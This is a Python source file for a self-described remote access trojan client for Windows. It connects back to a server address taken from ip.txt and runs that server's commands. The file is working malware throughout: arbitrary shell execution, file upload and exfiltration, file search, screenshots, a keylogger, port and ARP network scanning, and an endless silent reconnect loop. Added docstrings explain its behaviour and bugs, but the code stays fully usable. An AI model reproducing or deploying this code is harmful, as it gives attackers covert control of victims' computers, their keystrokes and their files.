rick_trojan_client.py
# -*- coding: utf-8 -*-
#Rick Hack Remote Trojan v 1.0
#This is the client Code
#This script connects to a remote server and gives it a reverse shell
#tested on Windows 7 System
#pip install image
#pip install socket
#pip install subprocess
#pip install os
#pip install random
#pip install time
#pip install pynput
#pip install scapy
#libraries
import socket
import subprocess
import os
import time
import random
import threading
import multiprocessing
from PIL import ImageGrab # Used to Grab a screenshot
import tempfile # Used to Create a temp directory
import shutil # Used to Remove the temp directory
#used to Keylogger
from pynput.keyboard import Key, Listener
from datetime import datetime
from scapy.all import ARP, Ether, srp
def networkscan(ip_range,c):
    """Broadcast an ARP request over ip_range and report responders over c.

    Uses scapy to send a single Ether/ARP broadcast (3 s timeout, no scapy
    output) and collects the source IP and MAC of every reply.  The report
    is printed locally and then sent through socket `c` as one encoded
    message.

    Network-visible artefact: an ARP who-has burst to ff:ff:ff:ff:ff:ff for
    every address in `ip_range`, originating from this host.
    """
    # IP Address for the destination
    # create ARP packet
    arp = ARP(pdst=ip_range)
    # create the Ether broadcast packet
    # ff:ff:ff:ff:ff:ff MAC address indicates broadcasting
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    # stack them
    packet = ether/arp
    # srp() returns (answered, unanswered); only the answered list is kept
    result = srp(packet, timeout=3, verbose=0)[0]
    # a list of clients, we will fill this in the upcoming loop
    clients = []
    for sent, received in result:
        # for each response, append ip and mac address to `clients` list
        clients.append({'ip': received.psrc, 'mac': received.hwsrc})
    # print clients
    # `result` is rebound here from scapy's answered list to the report text
    result=""
    result+=("Available devices in the network:" + '\n')
    result+=("IP" + " "*18+"MAC" + '\n')
    for client in clients:
        result+=("{:16} {}".format(client['ip'], client['mac']) + '\n')
    print(result)
    c.send(result.encode())
#function to capture the key pressed and record in keylogger txt file
def on_press(key):
    """pynput key-press callback: append one timestamped line to keylogs.txt.

    Side effects (per key press):
      * opens ``keylogs.txt`` in the process's current working directory in
        append mode and writes ``<ctime> pressed key: <str(key)>``;
      * prints the key and the running count to stdout;
      * increments the module-level ``interact`` counter, which must already
        exist (``keylogger()`` initialises it to 0).

    Returns False once ``interact`` reaches 10; the author's comment below
    indicates this is meant to stop recording after ten keys.  Returns None
    otherwise.
    """
    global interact
    fp=open("keylogs.txt","a") #create a text file and append the key in it
    print(key)
    # (original comment, pt: "avalidar a log") - timestamp the log entry
    today = datetime.now()
    now = today.ctime()
    fp.write(str(now) + " pressed key: " + str(key)+ "\n")
    fp.close()
    interact += 1
    print(interact)
    #record only 10 digited key's
    if interact >= 10 :
        return False
#Principal function to enable the keylogger
def keylogger():
    """Reset the global press counter and start a non-blocking pynput Listener.

    ``interact`` is set to 0 so ``on_press`` counts from a fresh start, then a
    Listener bound to ``on_press`` is started.  ``start()`` returns at once;
    nothing in this function waits for or stops the listener.  The string
    literal that follows is a leftover blocking variant and has no effect.
    """
    global interact
    interact = int(0)
    #listenter object
    listener = Listener(on_press=on_press)
    listener.start()
    """while True:
        with Listener(on_press=on_press) as listener:
            print("algo")
            listener.join()
            break
    """
#Function to call keylogger in threading mode
def keylogger_submit():
    """Intended to run ``keylogger`` on a separate thread.

    NOTE(review): ``target=keylogger()`` calls ``keylogger()`` synchronously
    in the caller's thread at this line; its return value (None) is what the
    Thread receives as ``target``, so the started thread has no work of its
    own.  The listener is therefore started by the direct call, not by the
    thread.
    """
    #creating a thread to call function kaylogger()
    keylogger_thread = threading.Thread(target=keylogger(),args=())
    keylogger_thread.start()
def scan(ip_target,ports_target,c):
    """TCP-connect check of comma-separated ports on ip_target, reported over c.

    Args:
        ip_target: host to connect to.
        ports_target: ports as a comma-separated string, e.g. "22,80,443".
        c: connected socket; one "Port N[OPEN]" / "Port N[CLOSED]" line is
           sent per port, after an initial "Scanning for open ports" banner.

    Each port is probed with a full connect attempt (``connect_ex``), so every
    probe is visible to the target as a TCP connection.  A single socket
    object is shared by all iterations and is closed after the first open
    port; the behaviour of later ``connect_ex`` calls on that closed socket
    is not defined by this code - NOTE(review): confirm before relying on
    results past the first open port.
    """
    c.send("Scanning for open ports \n".encode())
    meusocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # `porta` is first the list of port strings, then each element in turn
    porta= ports_target.split(',')
    for porta in porta:
        xport = int(porta)
        result = ""
        # connect_ex returns 0 on success instead of raising
        if meusocket.connect_ex((ip_target, xport)) == 0:
            result =("Port " + porta + "[OPEN]" + "\n")
            print(result)
            c.send(result.encode())
            meusocket.close()
        else:
            result =("Port " + porta + "[CLOSED]" + "\n")
            print(result)
            c.send(result.encode())
def transfer_up(c, command, path):
    """Receive a file from socket c and write it to `path` on this host.

    Reads 2048-byte chunks until a chunk ends with the literal ``DONE``
    marker; the marker's four bytes are stripped from the final chunk.  A
    chunk containing ``file not found`` aborts the transfer.

    Args:
        c: connected socket to read from / acknowledge on.
        command: unused by this function.
        path: destination path, opened with ``'wb'`` (overwrites any existing
            file; no validation of the path is performed here).

    Creates/overwrites the file at `path` on disk.  The file handle is only
    closed on the ``DONE`` branch; the abort branch and any exception leave
    it open.
    """
    f = open(path, 'wb')
    while True:
        bits = c.recv(2048)
        # end-of-transfer marker: the sender appends b'DONE' (see transfer)
        if bits.endswith('DONE'.encode()):
            f.write(bits[:-4])
            f.close()
            c.send('[+] upload transfer completed'.encode())
            break
        # the sender reports a missing source file with this literal
        if 'file not found'.encode() in bits:
            c.send('[-] impossible to transfer'.encode())
            break
        f.write(bits)
def transfer(c, path):
    """Send the file at `path` over socket c in 2048-byte chunks.

    After the last chunk the literal ``DONE`` is sent as an end marker
    (the counterpart of ``transfer_up``).  If `path` does not exist the
    literal ``file not found`` is sent instead.  Any path readable by this
    process can be requested; no restriction is applied here.
    """
    if os.path.exists(path):
        f = open(path, 'rb')
        packet = f.read(2048)
        while len(packet) > 0:
            c.send(packet)
            packet = f.read(2048)
        # marker is sent on the same stream, so a file body ending in
        # b'DONE' would be truncated by the receiver
        c.send('DONE'.encode())
        f.close()
    else:
        c.send('file not found'.encode())
def conexao():
    """Connect to the server listed in ip.txt and serve commands until told to stop.

    Start-up: reads ``ip.txt`` from the current working directory, one
    ``ip,port`` pair per line (the last line wins), then opens a plain TCP
    connection to it.  Every message received (up to 2048 bytes, decoded
    as text, no framing) is matched by substring against the keywords
    below, in this order; the first match wins, so e.g. any message that
    contains "terminate" ends the session.

      terminate            close the socket and return 1 (main() then exits)
      upload <x> <file>    receive a file into <cwd>\\<file> (third token)
      download <path>      send the file at <path>
      cd <dir>             chdir and report the new CWD
      exit                 call main() again (recursive; socket left open)
      search <path>*<ext>  walk <path> and list files ending in <ext>
      screencap            save a screenshot as img.jpg in a new temp dir
      portscan <ip> <ports>  TCP-connect probe (see scan)
      networkscan <range>  ARP sweep (see networkscan)
      keylogger on         start the key logger (see notes inline)
      anything else        run the text through the system shell
                           (``shell=True``; cmd.exe on the Windows target the
                           header mentions) and send stdout then stderr back

    Host artefacts this function creates or depends on: ``ip.txt`` beside
    the working directory, ``keylogs.txt`` (via on_press), a ``mkdtemp``
    directory containing ``img.jpg``, and shell child processes for
    unrecognised commands.  Outbound traffic is a single long-lived TCP
    connection to the address in ``ip.txt``.

    Returns:
        1 when a "terminate" command is received.  Otherwise never returns
        normally; socket errors propagate to the caller.
    """
    while True:
        #Get parameters from txt
        # strip('/n') removes the characters '/' and 'n' from both ends,
        # not a newline - NOTE(review): most likely intended '\n'
        path = os.getcwd().strip('/n')
        print(path)
        file = os.path.join(path,'ip.txt')
        file = open(file)
        print(file)
        lines = file.readlines()
        #getting ip and port of remote server
        # `lines` is rebound to each line; the last line's values survive
        for lines in lines:
            ip = lines.split(',', 1)[0]
            port = int(lines.split(',', 1)[1])
        file.close()
        print("Remote server is")
        print(ip)
        print(port)
        c = socket.socket()
        c.connect((ip,port))
        while True:
            # one recv per command; a message is at most 2048 bytes
            command = c.recv(2048)
            command = command.decode()
            print("comando executado:" + command)
            if 'terminate' in command:
                c.close()
                #break
                return 1
            #upload
            elif 'upload ' in command:
                path = os.getcwd()
                # third whitespace-separated token is the destination name
                arquivo = command.split(" ",2)[2]
                print(arquivo)
                # joined with a literal backslash; not normalised or checked
                path =(path + "\\" + arquivo)
                transfer_up(c, command, path)
            elif 'download ' in command:
                # exactly one space expected: "download <path>"
                download, path = command.split(' ')
                try:
                    transfer(c, path)
                except Exception as e:
                    c.send(str(e).encode())
                    pass
            elif 'cd ' in command:
                code, directory = command.split(' ')# the formula here is gonna be cd*directory
                try:
                    os.chdir(directory) # changing the directory
                    c.send(('[+] CWD is ' + os.getcwd()).encode()) # we send back a string mentioning the new CWD
                except Exception as e:
                    c.send(('[-] ' + str(e)).encode())
            elif 'exit' in command:
                print("ending of session!")
                # re-enters main() from inside this call; the current socket
                # and this stack frame are not released
                main()
            elif 'search' in command: #The Formula is search <path>*.<file extension> -->for example let's say that we got search C:\\*.pdf
                command = command[7:] #cut off the the first 7 character ,, output would be C:\\*.pdf
                path, ext = command.split('*')
                lists = '' # here we define a string where we will append our result on it
                for dirpath, dirname, files in os.walk(path):
                    for file in files:
                        if file.endswith(ext):
                            lists = lists + '\n' + os.path.join(dirpath, file)
                c.send(lists.encode())
            elif 'screencap' in command:
                # new temp directory each time; the file is never removed here
                dirpath = tempfile.mkdtemp()
                print(dirpath)
                ImageGrab.grab().save(dirpath + "\img.jpg", "JPEG")
                path = "Generated in path: " + dirpath + "\img.jpg use download function to get your screencap file"
                print(path)
                c.send(path.encode())
            elif 'portscan ' in command:
                print(command)
                ip_target = command.split(' ')[1]
                ports_target = command.split(' ')[2]
                scan(ip_target,ports_target,c)
            elif 'networkscan ' in command:
                c.send("starting network scan...".encode())
                ip_range = command.split(' ')[1]
                networkscan(ip_range,c)
            elif 'keylogger on' in command:
                time.sleep(1)
                c.send('Keylogger on'.encode())
                #Creating a subprocess to call keylogger_submit() function
                # NOTE(review): `target=keylogger_submit()` invokes it right
                # here in this process; the Process object gets None as its
                # target.  The listener therefore lives in this process, which
                # matches the author's remark below that logging continues.
                p = multiprocessing.Process(target=keylogger_submit())
                p.start()
                #wait 20 seconds, before kill the multiprocess of keylogger_submit()
                p.join(20)
                #killing process after seconds of wait but istill keyloggin in background
                #This is necessary to free the session of keylogger and make script able to
                #receive another commands
                if p.is_alive():
                    print("keylogger still running... let's kill it..")
                    p.terminate()
                    #listener.stop()
                    c.send('keylogger killed'.encode())
                pass
            #else another commands, for exemple, System Operation commands
            else:
                # untrusted text from the socket is passed straight to the shell
                CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                c.send(CMD.stdout.read())
                c.send(CMD.stderr.read())
def main():
    """Keep calling conexao() until it returns 1; retry on any error.

    The bare ``except:`` also catches ``KeyboardInterrupt`` and
    ``SystemExit``, so the loop cannot be stopped from the keyboard.
    ``random.randrange(1,2)`` always yields 1 (upper bound excluded), so a
    failed connection is retried after a fixed 1 s delay - a regular
    reconnect cadence while the server is unreachable.
    """
    # verify if server is alive
    while True:
        try:
            if conexao() == 1:
                break
        except:
            sleep_for = random.randrange(1,2)
            time.sleep(int(sleep_for))
# script entry point: runs the reconnect loop when executed directly
if __name__ == '__main__':
    main()